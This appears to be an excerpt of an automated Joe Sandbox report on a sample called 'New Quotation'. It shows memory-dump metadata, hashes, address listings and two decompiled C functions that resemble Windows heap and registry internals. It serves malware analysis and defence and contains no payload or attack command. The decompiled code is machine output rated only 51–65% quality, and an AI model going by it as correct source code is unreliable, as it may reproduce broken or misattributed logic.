                                                                                                                                                                                          0x1d83ec45
                                                                                                                                                                                          0x1d83ec26
                                                                                                                                                                                          0x1d83ec28
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ec94
                                                                                                                                                                                          0x1d83ec9a
                                                                                                                                                                                          0x1d83ec9b
                                                                                                                                                                                          0x1d83ec9e
                                                                                                                                                                                          0x1d83eca1
                                                                                                                                                                                          0x1d83eca4
                                                                                                                                                                                          0x1d83eca4
                                                                                                                                                                                          0x1d83ecad
                                                                                                                                                                                          0x1d7fd02f
                                                                                                                                                                                          0x1d7fd02f
                                                                                                                                                                                          0x1d7fd032
                                                                                                                                                                                          0x1d7fd034
                                                                                                                                                                                          0x1d7fd036
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fd036
                                                                                                                                                                                          0x1d7fd009

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: a0da4a30da677c789c65780269eb013149ae643dad5dfcbb85a585c03315c678
                                                                                                                                                                                          • Instruction ID: 568afcee22f625f79f845bb54721572091d91413f3cc9940b73b1850ccfebf77
                                                                                                                                                                                          • Opcode Fuzzy Hash: a0da4a30da677c789c65780269eb013149ae643dad5dfcbb85a585c03315c678
                                                                                                                                                                                          • Instruction Fuzzy Hash: 26818631D05119ABDF16CF5CC9807ADB7B2FB84311F16826AD82AB7384D635E942CBD2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7C6CC0 Relevance: .2, Instructions: 216COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                          			E1D7C6CC0(intOrPtr _a4, intOrPtr* _a8, signed int _a12, signed char _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				intOrPtr _v1044;
				char _v1052;
				signed int _v1056;
				signed int _v1060;
				void* _v1062;
				void* _v1064;
				signed int _v1068;
				void* _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t65;
				intOrPtr _t67;
				signed int _t69;
				signed int _t72;
				signed int _t73;
				signed int _t80;
				signed int _t81;
				signed int _t87;
				signed char _t99;
				void* _t100;
				signed int _t104;
				signed int _t106;
				signed int _t107;
				signed int _t108;
				void* _t110;
				signed int _t111;
				intOrPtr _t113;
				void* _t114;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed int _t119;

				_t119 = (_t117 & 0xfffffff8) - 0x424;
				_v8 =  *0x1d8cb370 ^ _t119;
				_t99 = _a16;
				_t113 = _a4;
				_v1044 = _t113;
				_v1040 = _a24;
				if(E1D7F1D10( &_v1052, _a8) < 0) {
					L4:
					_pop(_t110);
					_pop(_t114);
					_pop(_t100);
					return E1D814B50(_t63, _t100, _v8 ^ _t119, _t108, _t110, _t114);
				}
				_t65 = _a20;
				if(_t65 >= 0x3f4) {
					_t14 = _t65 + 0xc; // 0x137
					_t115 = _t14;
					L19:
					_t104 =  *( *[fs:0x30] + 0x18);
					__eflags = _t104;
					if(_t104 == 0) {
						L58:
						_t63 = 0xc0000017;
						goto L4;
					}
					_t67 =  *0x1d8c5d78; // 0x0
					_t69 = E1D7E5D90(_t104, _t104, _t67 + 0x180000, _t115);
					_v1068 = _t69;
					__eflags = _t69;
					if(_t69 == 0) {
						goto L58;
					}
					_t111 = _t69;
					_push( &_v1060);
					_push(_t115);
					_push(_t69);
					_push(2);
					_push( &_v1052);
					_push(_v1044);
					_t116 = E1D812B00();
					__eflags = _t116;
					if(_t116 >= 0) {
						L7:
						_t108 = _a12;
						__eflags = _t108;
						if(_t108 != 0) {
							_t106 = _a20;
							L26:
							_t72 =  *(_t111 + 4);
							__eflags = _t72 - 3;
							if(_t72 == 3) {
								L53:
								__eflags = _t108 - _t72;
								if(_t108 != _t72) {
									L57:
									_t116 = 0xc0000024;
									L15:
									_t73 = _v1056;
									__eflags = _t73;
									if(_t73 != 0) {
										E1D7E3BC0( *( *[fs:0x30] + 0x18), 0, _t73);
									}
									_t63 = _t116;
									goto L4;
								}
								_v1060 =  *((intOrPtr*)(_t111 + 8));
								__eflags = _t99;
								if(_t99 == 0) {
									L10:
									_t116 = 0x80000005;
									L11:
									_t107 = _v1040;
									__eflags = _t107;
									if(_t107 == 0) {
										goto L15;
									}
									__eflags = _t116;
									if(_t116 >= 0) {
										L14:
										 *_t107 = _v1060;
										goto L15;
									}
									__eflags = _t116 - 0x80000005;
									if(_t116 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t111 + 8)) - _t106;
								if( *((intOrPtr*)(_t111 + 8)) > _t106) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t111 + 8)));
								L52:
								_t55 = _t111 + 0xc; // 0xc
								_push(_t99);
								E1D8188C0();
								_t119 = _t119 + 0xc;
								goto L11;
							}
							__eflags = _t72 - 7;
							if(_t72 == 7) {
								goto L53;
							}
							__eflags = _t72 - 4;
							if(_t72 != 4) {
								__eflags = _t72 - 0xb;
								if(_t72 != 0xb) {
									__eflags = _t72 - 1;
									if(_t72 == 1) {
										_push("true");
										_pop(_t80);
										__eflags = _t108 - _t80;
										if(_t108 != _t80) {
											_t81 =  *((intOrPtr*)(_t111 + 8));
											_v1060 = _t81;
											__eflags = _t81 - _t106;
											if(_t81 > _t106) {
												goto L10;
											}
											_push(_t81);
											goto L52;
										}
										__eflags = _t106 - _t80;
										if(_t106 != _t80) {
											L34:
											_t116 = 0xc0000004;
											goto L15;
										}
										__eflags = _t99 & 0x00000003;
										if((_t99 & 0x00000003) == 0) {
											_v1060 = _t80;
											__eflags = _t99;
											if(__eflags == 0) {
												goto L10;
											}
											_t45 = _t111 + 0xc; // 0xc
											 *((intOrPtr*)(_t119 + 0x1c)) = _t45;
											_v1052 =  *((intOrPtr*)(_t111 + 8));
											_push(_t99);
											 *((short*)(_t119 + 0x1e)) =  *((intOrPtr*)(_t111 + 8));
											_push(0);
											_push( &_v1052);
											_t116 = E1D8007D0(_t99, _t111, _t116, __eflags);
											goto L11;
										}
										_t116 = 0x80000002;
										goto L15;
									}
									_t116 = 0xc0000024;
									goto L11;
								}
								__eflags = _t108 - _t72;
								if(_t108 != _t72) {
									goto L57;
								}
								_t87 = 8;
								__eflags = _t106 - _t87;
								if(_t106 != _t87) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t111 + 8)) - _t87;
								if( *((intOrPtr*)(_t111 + 8)) != _t87) {
									goto L34;
								}
								_v1060 = _t87;
								__eflags = _t99;
								if(_t99 == 0) {
									goto L10;
								}
								 *_t99 =  *((intOrPtr*)(_t111 + 0xc));
								 *((intOrPtr*)(_t99 + 4)) =  *((intOrPtr*)(_t111 + 0x10));
								goto L11;
							}
							__eflags = _t108 - _t72;
							if(_t108 != _t72) {
								goto L57;
							}
							__eflags = _t106 - _t72;
							if(_t106 != _t72) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t111 + 8)) - _t72;
							if( *((intOrPtr*)(_t111 + 8)) != _t72) {
								goto L34;
							}
							_v1060 = _t72;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L10;
							}
							 *_t99 =  *((intOrPtr*)(_t111 + 0xc));
							goto L11;
						}
						_t106 =  *((intOrPtr*)(_t111 + 8));
						__eflags = _t106 - _a20;
						if(_t106 <= _a20) {
							_t108 =  *(_t111 + 4);
							goto L26;
						}
						_v1060 = _t106;
						goto L10;
					}
					__eflags = _t116 - 0x80000005;
					if(_t116 != 0x80000005) {
						goto L15;
					}
					E1D7E3BC0( *( *[fs:0x30] + 0x18), 0, _t111);
					L18:
					_t115 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t111 =  &_v1036;
				_push(_t111);
				_push(2);
				_push( &_v1052);
				_push(_t113);
				_t116 = E1D812B00();
				if(_t116 >= 0) {
					__eflags = 0;
					_v1056 = 0;
					goto L7;
				}
				if(_t116 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}









































                                                                                                                                                                                          0x1d7c6cc8
                                                                                                                                                                                          0x1d7c6cd5
                                                                                                                                                                                          0x1d7c6ce3
                                                                                                                                                                                          0x1d7c6ce7
                                                                                                                                                                                          0x1d7c6cf0
                                                                                                                                                                                          0x1d7c6cf5
                                                                                                                                                                                          0x1d7c6d00
                                                                                                                                                                                          0x1d7c6d40
                                                                                                                                                                                          0x1d7c6d47
                                                                                                                                                                                          0x1d7c6d48
                                                                                                                                                                                          0x1d7c6d49
                                                                                                                                                                                          0x1d7c6d54
                                                                                                                                                                                          0x1d7c6d54
                                                                                                                                                                                          0x1d7c6d02
                                                                                                                                                                                          0x1d7c6d0a
                                                                                                                                                                                          0x1d7c6d57
                                                                                                                                                                                          0x1d7c6d57
                                                                                                                                                                                          0x1d829a29
                                                                                                                                                                                          0x1d829a2f
                                                                                                                                                                                          0x1d829a32
                                                                                                                                                                                          0x1d829a34
                                                                                                                                                                                          0x1d829bd1
                                                                                                                                                                                          0x1d829bd1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829bd1
                                                                                                                                                                                          0x1d829a3a
                                                                                                                                                                                          0x1d829a47
                                                                                                                                                                                          0x1d829a4c
                                                                                                                                                                                          0x1d829a50
                                                                                                                                                                                          0x1d829a52
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829a5c
                                                                                                                                                                                          0x1d829a5e
                                                                                                                                                                                          0x1d829a5f
                                                                                                                                                                                          0x1d829a60
                                                                                                                                                                                          0x1d829a61
                                                                                                                                                                                          0x1d829a67
                                                                                                                                                                                          0x1d829a68
                                                                                                                                                                                          0x1d829a71
                                                                                                                                                                                          0x1d829a73
                                                                                                                                                                                          0x1d829a75
                                                                                                                                                                                          0x1d8299cb
                                                                                                                                                                                          0x1d8299cb
                                                                                                                                                                                          0x1d8299ce
                                                                                                                                                                                          0x1d8299d0
                                                                                                                                                                                          0x1d829a9d
                                                                                                                                                                                          0x1d829aa0
                                                                                                                                                                                          0x1d829aa0
                                                                                                                                                                                          0x1d829aa3
                                                                                                                                                                                          0x1d829aa6
                                                                                                                                                                                          0x1d829ba9
                                                                                                                                                                                          0x1d829ba9
                                                                                                                                                                                          0x1d829bab
                                                                                                                                                                                          0x1d829bc7
                                                                                                                                                                                          0x1d829bc7
                                                                                                                                                                                          0x1d829a05
                                                                                                                                                                                          0x1d829a05
                                                                                                                                                                                          0x1d829a09
                                                                                                                                                                                          0x1d829a0b
                                                                                                                                                                                          0x1d829a19
                                                                                                                                                                                          0x1d829a19
                                                                                                                                                                                          0x1d829a1e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829a1e
                                                                                                                                                                                          0x1d829bb0
                                                                                                                                                                                          0x1d829bb4
                                                                                                                                                                                          0x1d829bb6
                                                                                                                                                                                          0x1d8299e6
                                                                                                                                                                                          0x1d8299e6
                                                                                                                                                                                          0x1d8299eb
                                                                                                                                                                                          0x1d8299eb
                                                                                                                                                                                          0x1d8299ef
                                                                                                                                                                                          0x1d8299f1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8299f3
                                                                                                                                                                                          0x1d8299f5
                                                                                                                                                                                          0x1d8299ff
                                                                                                                                                                                          0x1d829a03
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829a03
                                                                                                                                                                                          0x1d8299f7
                                                                                                                                                                                          0x1d8299fd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8299fd
                                                                                                                                                                                          0x1d829bbc
                                                                                                                                                                                          0x1d829bbf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829b94
                                                                                                                                                                                          0x1d829b97
                                                                                                                                                                                          0x1d829b97
                                                                                                                                                                                          0x1d829b9b
                                                                                                                                                                                          0x1d829b9c
                                                                                                                                                                                          0x1d829ba1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829ba1
                                                                                                                                                                                          0x1d829aac
                                                                                                                                                                                          0x1d829aaf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829ab5
                                                                                                                                                                                          0x1d829ab8
                                                                                                                                                                                          0x1d829aeb
                                                                                                                                                                                          0x1d829aee
                                                                                                                                                                                          0x1d829b20
                                                                                                                                                                                          0x1d829b23
                                                                                                                                                                                          0x1d829b2f
                                                                                                                                                                                          0x1d829b31
                                                                                                                                                                                          0x1d829b32
                                                                                                                                                                                          0x1d829b34
                                                                                                                                                                                          0x1d829b82
                                                                                                                                                                                          0x1d829b85
                                                                                                                                                                                          0x1d829b89
                                                                                                                                                                                          0x1d829b8b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829b91
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829b91
                                                                                                                                                                                          0x1d829b36
                                                                                                                                                                                          0x1d829b38
                                                                                                                                                                                          0x1d829ae1
                                                                                                                                                                                          0x1d829ae1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829ae1
                                                                                                                                                                                          0x1d829b3a
                                                                                                                                                                                          0x1d829b3d
                                                                                                                                                                                          0x1d829b49
                                                                                                                                                                                          0x1d829b4d
                                                                                                                                                                                          0x1d829b4f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829b55
                                                                                                                                                                                          0x1d829b58
                                                                                                                                                                                          0x1d829b60
                                                                                                                                                                                          0x1d829b69
                                                                                                                                                                                          0x1d829b6a
                                                                                                                                                                                          0x1d829b73
                                                                                                                                                                                          0x1d829b75
                                                                                                                                                                                          0x1d829b7b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829b7b
                                                                                                                                                                                          0x1d829b3f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829b3f
                                                                                                                                                                                          0x1d829b25
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829b25
                                                                                                                                                                                          0x1d829af0
                                                                                                                                                                                          0x1d829af2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829afa
                                                                                                                                                                                          0x1d829afb
                                                                                                                                                                                          0x1d829afd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829aff
                                                                                                                                                                                          0x1d829b02
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829b04
                                                                                                                                                                                          0x1d829b08
                                                                                                                                                                                          0x1d829b0a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829b13
                                                                                                                                                                                          0x1d829b18
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829b18
                                                                                                                                                                                          0x1d829aba
                                                                                                                                                                                          0x1d829abc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829ac2
                                                                                                                                                                                          0x1d829ac4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829ac6
                                                                                                                                                                                          0x1d829ac9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829acb
                                                                                                                                                                                          0x1d829acf
                                                                                                                                                                                          0x1d829ad1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829ada
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829ada
                                                                                                                                                                                          0x1d8299d6
                                                                                                                                                                                          0x1d8299d9
                                                                                                                                                                                          0x1d8299dc
                                                                                                                                                                                          0x1d829a98
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829a98
                                                                                                                                                                                          0x1d8299e2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8299e2
                                                                                                                                                                                          0x1d829a7b
                                                                                                                                                                                          0x1d829a81
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829a91
                                                                                                                                                                                          0x1d829a25
                                                                                                                                                                                          0x1d829a25
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829a25
                                                                                                                                                                                          0x1d7c6d10
                                                                                                                                                                                          0x1d7c6d11
                                                                                                                                                                                          0x1d7c6d16
                                                                                                                                                                                          0x1d7c6d1c
                                                                                                                                                                                          0x1d7c6d1d
                                                                                                                                                                                          0x1d7c6d23
                                                                                                                                                                                          0x1d7c6d24
                                                                                                                                                                                          0x1d7c6d2a
                                                                                                                                                                                          0x1d7c6d2e
                                                                                                                                                                                          0x1d8299c5
                                                                                                                                                                                          0x1d8299c7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8299c7
                                                                                                                                                                                          0x1d7c6d3a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 406218fc23dcd61bea9539857ce51956f640d925a080af59800db8aca9fc54be
                                                                                                                                                                                          • Instruction ID: 9bfa3dbbc9490cf1e20ec30c65d863806fcab5793c83e759bc2155781fc25618
                                                                                                                                                                                          • Opcode Fuzzy Hash: 406218fc23dcd61bea9539857ce51956f640d925a080af59800db8aca9fc54be
                                                                                                                                                                                          • Instruction Fuzzy Hash: DD7193756847579FD711DE19C880B6AB7E4FB486A0F82892AF959D7200D730E890CB93
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D801EED Relevance: .2, Instructions: 210COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                          			E1D801EED(signed int __ecx, signed int* __edx, intOrPtr _a4, signed int _a12, signed int _a16, char _a20, intOrPtr _a24) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				signed int _t102;
				signed int _t107;
				void* _t110;
				char* _t119;
				signed int _t120;
				signed int _t124;
				signed int _t126;
				signed int _t129;
				signed int _t136;
				signed int _t142;
				char _t156;
				intOrPtr _t159;
				signed int _t170;
				signed int _t172;
				void* _t173;
				void* _t175;
				signed int _t179;
				signed int _t184;
				signed int _t185;
				signed int _t191;
				signed int* _t192;
				signed int* _t193;

				_t191 = __ecx;
				_t159 = _a24;
				_t192 = __edx;
				_v24 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
				_t102 = _t159 - _a16;
				if(_t102 > 0xfffff000) {
					L15:
					return 0;
				}
				asm("cdq");
				_t156 = _a20;
				_v16 = _t102 / 0x1000;
				_t107 = _a4 + 0x00000007 & 0xfffffff8;
				_t179 = _t107 + __edx;
				_v20 = _t107 >> 0x00000003 & 0x0000ffff;
				_t110 = _t179 + 0x28;
				_v12 = _t179;
				if(_t110 >= _t156) {
					if(_t110 >= _t159) {
						goto L15;
					}
					_v8 = _t179 - _t156 + 8;
					if(E1D8068EA( *((intOrPtr*)(__ecx + 0x1f8)) -  *((intOrPtr*)(__ecx + 0x244)), __ecx, __ecx + 0xd4) == 0) {
						L26:
						 *((intOrPtr*)(_t191 + 0x224)) =  *((intOrPtr*)(_t191 + 0x224)) + 1;
						goto L15;
					}
					_push(E1D7CF0E1(__ecx, 1));
					_push(0x1000);
					_push( &_v8);
					_push(0);
					_push( &_a20);
					_push(0xffffffff);
					if(E1D812B10() < 0) {
						goto L26;
					}
					if(E1D7E3C40() == 0) {
						_t119 = 0x7ffe0380;
					} else {
						_t119 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t119 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E1D88EFD3(_t156, _t191, _a20, _v8, 3);
					}
					_t156 = _a20 + _v8;
					_t159 = _a24;
					_a20 = _t156;
				}
				_t192[0] = 1;
				_t120 = _t159 - _t156;
				_t192[1] = 1;
				asm("cdq");
				_t184 = _t120 % 0x1000;
				_v28 = _t120 / 0x1000;
				 *_t192 = _v20;
				_t192[1] =  *(_t191 + 0x54);
				if((_v24 & 0x00001000) != 0) {
					_t124 = E1D7FFDB9(1, _t184);
					_t156 = _a20;
					_t192[0xd] = _t124;
				}
				_t192[0xb] = _t192[0xb] & 0x00000000;
				_t185 = _v12;
				_t192[3] = _a12;
				_t126 = _a16;
				_t192[7] = _t126;
				_t170 = _v16 << 0xc;
				_t192[6] = _t191;
				_t192[0xa] = _t126 + _t170;
				_t192[8] = _v16;
				_t129 =  &(_t192[0xe]);
				_t192[2] = 0xffeeffee;
				_t192[9] = _t185;
				 *((intOrPtr*)(_t191 + 0x1f8)) =  *((intOrPtr*)(_t191 + 0x1f8)) + _t170;
				 *((intOrPtr*)(_t191 + 0x1f4)) =  *((intOrPtr*)(_t191 + 0x1f4)) + _t170;
				 *(_t129 + 4) = _t129;
				 *_t129 = _t129;
				_t192[1] = _t129 & 0xffffff00 | _t192[6] != _t192;
				 *(_t185 + 4) =  *_t192 ^  *(_t191 + 0x54);
				if(_t192[6] != _t192) {
					_t136 = (_t185 - _t192 >> 0x10) + 1;
					_v24 = _t136;
					if(_t136 >= 0xfe) {
						_push(0);
						_push(0);
						_push(_t192);
						_push(_t185);
						_t175 = 3;
						E1D895FED(_t175, _t192[6]);
						_t156 = _a20;
						_t185 = _v12;
						_t136 = _v24;
					}
				} else {
					_t136 = 0;
				}
				 *(_t185 + 6) = _t136;
				E1D7E096B(_t191, _t192, _t156 - 0x18, _v28 << 0xc, _t185,  &_v8);
				if( *((intOrPtr*)(_t191 + 0x4c)) != 0) {
					_t192[0] = _t192[0] ^  *_t192 ^ _t192[0];
					 *_t192 =  *_t192 ^  *(_t191 + 0x50);
				}
				if(_v8 != 0) {
					E1D7E0B10(_t191, _v12, _v8);
				}
				_t142 = _t191 + 0xa4;
				_t193 =  &(_t192[4]);
				_t172 =  *(_t142 + 4);
				if( *_t172 != _t142) {
					_push(0);
					_push( *_t172);
					_push(0);
					_push(_t142);
					_t173 = 0xd;
					E1D895FED(_t173, 0);
				} else {
					 *_t193 = _t142;
					_t193[1] = _t172;
					 *_t172 = _t193;
					 *(_t142 + 4) = _t193;
				}
				 *((intOrPtr*)(_t191 + 0x204)) =  *((intOrPtr*)(_t191 + 0x204)) + 1;
				return 1;
			}
































                                                                                                                                                                                          0x1d801f01
                                                                                                                                                                                          0x1d801f03
                                                                                                                                                                                          0x1d801f06
                                                                                                                                                                                          0x1d801f08
                                                                                                                                                                                          0x1d801f0d
                                                                                                                                                                                          0x1d801f15
                                                                                                                                                                                          0x1d802088
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d802088
                                                                                                                                                                                          0x1d801f1b
                                                                                                                                                                                          0x1d801f23
                                                                                                                                                                                          0x1d801f26
                                                                                                                                                                                          0x1d801f2f
                                                                                                                                                                                          0x1d801f32
                                                                                                                                                                                          0x1d801f3b
                                                                                                                                                                                          0x1d801f3e
                                                                                                                                                                                          0x1d801f41
                                                                                                                                                                                          0x1d801f46
                                                                                                                                                                                          0x1d841d85
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d841da6
                                                                                                                                                                                          0x1d841db0
                                                                                                                                                                                          0x1d841e2a
                                                                                                                                                                                          0x1d841e2a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d841e2a
                                                                                                                                                                                          0x1d841dbc
                                                                                                                                                                                          0x1d841dc2
                                                                                                                                                                                          0x1d841dc6
                                                                                                                                                                                          0x1d841dc7
                                                                                                                                                                                          0x1d841dcc
                                                                                                                                                                                          0x1d841dcd
                                                                                                                                                                                          0x1d841dd6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d841ddf
                                                                                                                                                                                          0x1d841df1
                                                                                                                                                                                          0x1d841de1
                                                                                                                                                                                          0x1d841dea
                                                                                                                                                                                          0x1d841dea
                                                                                                                                                                                          0x1d841df9
                                                                                                                                                                                          0x1d841e14
                                                                                                                                                                                          0x1d841e14
                                                                                                                                                                                          0x1d841e1c
                                                                                                                                                                                          0x1d841e1f
                                                                                                                                                                                          0x1d841e22
                                                                                                                                                                                          0x1d841e22
                                                                                                                                                                                          0x1d801f4e
                                                                                                                                                                                          0x1d801f54
                                                                                                                                                                                          0x1d801f56
                                                                                                                                                                                          0x1d801f5a
                                                                                                                                                                                          0x1d801f60
                                                                                                                                                                                          0x1d801f62
                                                                                                                                                                                          0x1d801f68
                                                                                                                                                                                          0x1d801f74
                                                                                                                                                                                          0x1d801f7b
                                                                                                                                                                                          0x1d841e38
                                                                                                                                                                                          0x1d841e3d
                                                                                                                                                                                          0x1d841e40
                                                                                                                                                                                          0x1d841e40
                                                                                                                                                                                          0x1d801f87
                                                                                                                                                                                          0x1d801f8b
                                                                                                                                                                                          0x1d801f8e
                                                                                                                                                                                          0x1d801f91
                                                                                                                                                                                          0x1d801f94
                                                                                                                                                                                          0x1d801f97
                                                                                                                                                                                          0x1d801f9c
                                                                                                                                                                                          0x1d801f9f
                                                                                                                                                                                          0x1d801fa5
                                                                                                                                                                                          0x1d801fa8
                                                                                                                                                                                          0x1d801fab
                                                                                                                                                                                          0x1d801fb2
                                                                                                                                                                                          0x1d801fb5
                                                                                                                                                                                          0x1d801fbb
                                                                                                                                                                                          0x1d801fc1
                                                                                                                                                                                          0x1d801fc4
                                                                                                                                                                                          0x1d801fcc
                                                                                                                                                                                          0x1d801fd6
                                                                                                                                                                                          0x1d801fdd
                                                                                                                                                                                          0x1d80205a
                                                                                                                                                                                          0x1d80205b
                                                                                                                                                                                          0x1d802063
                                                                                                                                                                                          0x1d802069
                                                                                                                                                                                          0x1d80206b
                                                                                                                                                                                          0x1d80206d
                                                                                                                                                                                          0x1d80206e
                                                                                                                                                                                          0x1d802074
                                                                                                                                                                                          0x1d802075
                                                                                                                                                                                          0x1d80207a
                                                                                                                                                                                          0x1d80207d
                                                                                                                                                                                          0x1d802080
                                                                                                                                                                                          0x1d802080
                                                                                                                                                                                          0x1d801fdf
                                                                                                                                                                                          0x1d801fdf
                                                                                                                                                                                          0x1d801fdf
                                                                                                                                                                                          0x1d801fe1
                                                                                                                                                                                          0x1d801ff8
                                                                                                                                                                                          0x1d802001
                                                                                                                                                                                          0x1d80200b
                                                                                                                                                                                          0x1d802011
                                                                                                                                                                                          0x1d802011
                                                                                                                                                                                          0x1d802017
                                                                                                                                                                                          0x1d802021
                                                                                                                                                                                          0x1d802021
                                                                                                                                                                                          0x1d802026
                                                                                                                                                                                          0x1d80202c
                                                                                                                                                                                          0x1d80202f
                                                                                                                                                                                          0x1d802034
                                                                                                                                                                                          0x1d841e49
                                                                                                                                                                                          0x1d841e4b
                                                                                                                                                                                          0x1d841e4f
                                                                                                                                                                                          0x1d841e51
                                                                                                                                                                                          0x1d841e54
                                                                                                                                                                                          0x1d841e55
                                                                                                                                                                                          0x1d80203a
                                                                                                                                                                                          0x1d80203a
                                                                                                                                                                                          0x1d80203c
                                                                                                                                                                                          0x1d80203f
                                                                                                                                                                                          0x1d802041
                                                                                                                                                                                          0x1d802041
                                                                                                                                                                                          0x1d802044
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
